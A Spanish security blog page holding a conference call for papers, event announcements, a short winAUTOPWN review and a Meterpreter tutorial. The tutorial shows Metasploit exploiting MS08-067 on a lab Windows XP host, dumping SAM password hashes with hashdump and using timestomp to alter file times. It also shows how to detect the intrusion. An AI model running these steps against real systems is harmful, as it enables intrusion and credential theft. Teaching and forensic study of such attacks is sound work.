m313 Security Blog

===============================
- Rooted CON 2010 -
C A L L F O R P A P E R S
===============================

.: [ INTRO ]

Rooted CON es un Congreso de Seguridad que se celebrará en Madrid
(España) en Marzo de 2010. Nuestro objetivo es promover la seguridad,
ofreciendo charlas altamente técnicas con un enfoque práctico (combinación
de teoría / demo) y neutralidad (aunque apostamos por las empresas y
queremos que éstas participen en el congreso, deberá primar el contenido
técnico y objetivo).

También deseamos que la gente participe, se divierta… ¡y hasta se
lleve un premio a casa! Por ello, llevaremos a cabo diversos eventos
(aparte de las conferencias), siendo uno de los más importantes el
concurso CTF (”Capture the flag”), que contará con importantes premios
en metálico y que ha sido diseñado por ni más ni menos que uno de los
“Sexy Pandas” (equipo finalista del tradicional “Defcon CTF”).

Y por supuesto si todavía te quedan fuerzas también podrás aprovechar
para vivir a tope el encanto de las noches madrileñas…

.: [ FORMATO ]

Nos gustaría recibir dos tipos de propuestas:
- charlas rápidas. Duración: 20′.
- charlas normales. Duración: 50′.

Si tienes una idea loca/interesante y fresca que se puede contar en
poco tiempo, por favor, no lo dudes y propón una charla rápida. Si tu
idea es más loca todavía y necesitas más tiempo para explicarla en
profundidad usa la segunda modalidad: la charla normal.

Sólo aceptaremos propuestas en español e inglés. Haremos todo lo
posible para tener traducción simultánea en la sala pero no podemos
prometer nada ya que dependerá del presupuesto y de los patrocinadores.

.: [ TEMÁTICA ]

Nos interesa cualquier tema puntero del mercado de la seguridad. Éstos
son sólo algunos ejemplos:
- técnicas innovadoras tanto defensivas como ofensivas.
- todo lo relacionado con el fraude, phishing, troyanos en entornos
financieros, mecanismos de protección asociados, etc.
- “ingeniería inversa”, técnicas de bajo nivel, kernel, …
- descubrimiento de vulnerabilidades, “fuzzing” y técnicas relacionadas.
- ataques en entornos virtualizados, sistemas de cluster, “cloud
computing” y nuevos productos de seguridad “en la nube”.
- criptografía y criptoanálisis.
- seguridad en entornos móviles.
- herramientas de hacking: desarrollos propios.
- seguridad documental.
- voz sobre IP, “phreaking”, …
- análisis forense y contramedidas.
- seguridad en dispositivos inalámbricos.
- esteganografía y todo tipo de canales subliminales.
- seguridad en aplicaciones web.
- …

.: [ PROCEDIMIENTO PARA PRESENTAR UNA PROPUESTA ]

¿Te gustaría hablar en Rooted CON? ¡No te olvides de hacer las charlas
ilustrativas e incluir demos!

Envíanos tu solicitud por correo electrónico a:
cfp -AT- rootedcon.es

Para que tu charla sea aceptada en el proceso inicial de selección
*deberá* respetar el formato descrito previamente e incluir *toda* la
información siguiente:

- título
- autor (nombre completo y opcionalmente nick/apodo)
- bio (unas líneas diciendo quién eres)
- duración (¿charla normal o rápida?)
- resumen (deberá ser lo suficientemente extenso como para poder ser
correctamente evaluado)
- ubicación/nacionalidad
- medios necesarios para impartir la charla
- ¿tienes pensado dar la misma (o similar) charla en otras conferencias?
¿En cuál?

.: [ FECHAS ]

1 Octubre, 2009 – Se abre el CFP.
20 Diciemebre, 2009 – Se cierra el CFP.
31 Diciembre, 2009 – Ponentes seleccionados.
10 Enero, 2010 – Entrega del “paper” final y materiales de la presentación.

.: [ PRIVILEGIOS PARA PONENTES ]

Los ponentes gozarán de los siguientes beneficios:
- Alojamiento gratuito.
- Acceso gratuito al congreso.
- Gastos de viaje (en la medida de lo posible).
- Tickets/bebidas gratis durante la fiesta.

.: [ PATROCINADORES ]

Todavía tienes la oportunidad de ayudarnos a organizar el mejor
congreso de seguridad de España y a la vez obtener un interesante ROI.
Si estás interesado en ser uno de nuestros patrocinadores, por favor
contacta con nosotros:

patrocinio -AT- rootedcon.es

.: [ ENLACES ]

- Sitio Web
http://www.rootedcon.es/
- Grupo en Facebook
http://www.facebook.com/group.php?gid=96410924798
- Grupo en LinkedIn
http://www.linkedin.com/groups?gid=1969438
- Lista de correo “sólo-anuncios”
https://listas.rootedcon.es/mailman/listinfo/rooted-announce

-=EOF=-

Compártelo

Los chicos de Offensive Security han liberado el mejor curso hasta la fecha sobre Metasploit en su versión online. Este curso es una referencia para cualquier usuario de la herramienta y es de obligada lectura:

http://www.offensive-security.com/metasploit-unleashed/

Compártelo

El viernes ocho de Mayo de 2009, ISSA organiza en colaboración del Consejo Superior de Investigaciones Científicas la primera edición de las Conferencias ISSA de Seguridad. La conferencia se celebrará en el edificio del Instituto de Física Aplicada del CSIC.

Programa:
- 18:00 Apertura a cargo de Gonzalo Álvarez Marañón (CSIC)
- 18:05 “Seguridad de Servicios Web de Código Abierto” – Victor Manuel Fernandez (OpenSolaris)
- 19:10 “Retos para la Seguridad de Cloud Computing” – Oscar Delgado (CSIC)
- 20:00 Descanso
- 20:15 “Métricas y Madurez de Procesos de Seguridad” – Vicente Aceituno, (ISSA)
- 21:00 Despedida

Dado que el aforo está limitado a 80 plazas recomendamos inscribirse suscribiéndose a la lista de Eventos ISSA enviando un correo a:
eventos-issa+subscribe arroba googlegroups.com

Los inscritos tienen preferencia sobre los no inscritos para acceder a la sala antes de las 17:55

El Instituto de Física Aplicada está en la Calle Serrano, 144.

Para recibir una invitación para los próximos eventos de seguridad organizados por ISSA unos días antes de su anuncio público, lo que da mayores oportunidades de asistir cuando el aforo es limitado, recomendamos suscribirse enviando un correo a:
eventos-issa+subscribe arroba googlegroups.com

Compártelo

winAUTOPWN es una herramienta que permite atacar automáticamente sistemas Windows. Tiene una gran cantidad de exploits integrados y a diferencia de otras soluciones como Metasploit, Immunity Canvas o Core Impact apenas tiene dependencias.

Funciona en linea de comandos e incluye exploits en perl, php, python y cygwin dlls.
Ejecutarlo es tan simple como lanzar el binario, y nos va preguntando por datos sobre la víctima:

No he trasteado demasiado con la herramienta, aunque la he lanzado sobre la máquina Windows que utilizé de demo en los artículos sobre Metasploit y Meterpreter y no han tenido éxito los exploits sobre las mismas vulnerabilidades (ms08-067), tal como puede verse a continuación:

La principal ventaja es que se actualiza constantemente y es gratuita.
winAUTOPWN puede descargarse aqui. La página oficial es la siguiente:

http://winautopwn.co.nr/

Compártelo

El meterpreter o meta intérprete es una familia de plugins avanzados para utilizar sobre sistemas Windows comprometidos que tienen como característica fundamental su que todo es cargado en la memoria del sistema sin crear ningún proceso adicional. Además aporta mucha flexibilidad, permitiendo la inyección dinámica de dll’s.

Todo esto permite realizar los ataques haciendo algo menos de ruido. Hoy vamos a realizar la misma intrusión que hace unas semanas, pero utilizando como payload el meterpreter.

En esencia realizar la intrusión es igual, solo hay que seleccionar el payload de la familia meterpreter y en caso necesario modificar las opciones del payload elegido. Para la demo he utilizado una simple shell (windows/meterpreter/bind_tcp). La lista total es la siguiente:

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================

Name                                            Description
—-                                            ———–
windows/meterpreter/bind_ipv6_tcp               Windows Meterpreter, Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp               Windows Meterpreter, Bind TCP Stager (No NX Support)
windows/meterpreter/bind_tcp                    Windows Meterpreter, Bind TCP Stager
windows/meterpreter/reverse_ipv6_tcp            Windows Meterpreter, Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp            Windows Meterpreter, Reverse TCP Stager (No NX Support)
windows/meterpreter/reverse_ord_tcp             Windows Meterpreter, Reverse Ordinal TCP Stager
windows/meterpreter/reverse_tcp                 Windows Meterpreter, Reverse TCP Stager

Esta shell a través del meterpreter tiene las siguientes opciones:

msf exploit(ms08_067_netapi) > show options

Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting                                                                     Required  Description
—-      —————                                                                     ——–  ———–
DLL       C:/Documents and Settings/m313/Datos de programa/msf32/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
EXITFUNC  thread                                                                              yes       Exit technique: seh, thread, process
LPORT     4444                                                                                yes       The local port
RHOST     192.168.1.66

Como podemos apreciar hay una opción para la dll que se inyectará en el sistema.  Una vez definidas las opciones explotar el sistema no tiene misterio, se aprovecha la vulnerabilidad y se inyecta en memoria la dll correspondiente:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:Spanish
[*] Selected Target: Windows XP SP2 Spanish (NX)
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.1.8:1545 -> 192.168.1.66:4444)

Así de sencillo y ya estamos utilizando el meterpreter, sin embargo esto es solo el comienzo. Ahora desde la shell meterpreter tenemos muchas e interesantes opciones a las que accedemos con el caracter ?:

Core Commands
=============

Command       Description
——-       ———–
timestomp     Manipulate file MACE attributes

Hay que resaltar la potencia de comandos para inyectar dll’s, subir ficheros, ejecutar scripts o uno que me gusta especialmente para migrar el meterpreter a otro proceso (migrate). Esto es especialmente importante si por ejemplo hemos utilizado un exploit contra una aplicación que el usuario pueda cerrar, como por ejemplo el Internet Explorer.

Probaremos uno que es especialmente util, el hashdump que sirve para extraer el contenido de la SAM, tal como podemos ver a continuación:

hashdump
Administrador:500:aad3b4b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Asistente de ayuda2:1000:7634e475b9740af3287b02a6be6eea:6118e99d59982568853cbf98a42f2a:::
Invitado:501:aad3b435b504eeaad3b435b51404ee:31d6c0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0:1002:aad35b51404eeaad3b435b51404ee:b7aec7c1c40967c5a965b09510f818e:::
test:1003:aad35b51404eeaad3b435b51404ee:31d6cfe06ae931b73c59d7e0c089c0:::

Desde el punto de vista del análisis forense de un sistema comprometido y utilizando el meterpreter tenemos un par de puntos interesantes, desde el punto de vista del atacante la opción timestop, que nos permite manipular los atributos de los ficheros, como el tiempo del ultimo acceso, modificación, etc.

Desde el punto de vita de la víctima hay que destacar que el meterpreter no deja rastro de sí mismo en el dico duro, por lo que es necesario un análisis de la memoria RAM para detectarlo. Lo que sí se puede detectar es la conexión entre las máquinas objetivo y atacante.
Imaginemos que estamos en la máquina comprometida y sospechamos que hemos podido ser víctimas de una intrusión. Una ejecución de un programa para ver los proceso del sistema nos alerta al comprobar que uno de los procesos svchost.exe tiene un número muy elevado de hilos y ocupa un tamaño muy considerable en relación con los demás (He utilizado la herramienta Hijackfree de a-squared ). La ejecución del comando netstat nos da la pista definitiva sobre la intrusión al desvelarnos la conexión establecida contra el atacante:

Como nota adicional comentar que si ejecutamos la herramienta ListDlls de SysInternals sobre el proceso sospechoso nos muestra la dll inyectada por el meterpreter (metsrv.dll), facilmente identificable porque no incorpora información acerca del versionado, tal como podemos apreciar a continuación(la salida está sesgada para su mejor lectura):

C:\Documents and Settings\Administrador\Escritorio>Listdlls.exe -r 1108

Como conclusión resaltar que si lo que se pretende es simplemente evidenciar que un sistema es vulnerable quizá no sea necesario el meterpreter, pero si lo que se busca es comprometer el sistema haciendo el menor ruido posible, y utilizarlo como base para realizar futuros ataques o mantener el compromiso del mismo durante un largo periodo de tiempo meterpreter hará las delicias del intruso.

Referencias:

http://www.nologin.org/Downloads/Papers/meterpreter.pdf
http://www.learnsecurityonline.com/vid/MSF3-met/MSF3-met.html

Compártelo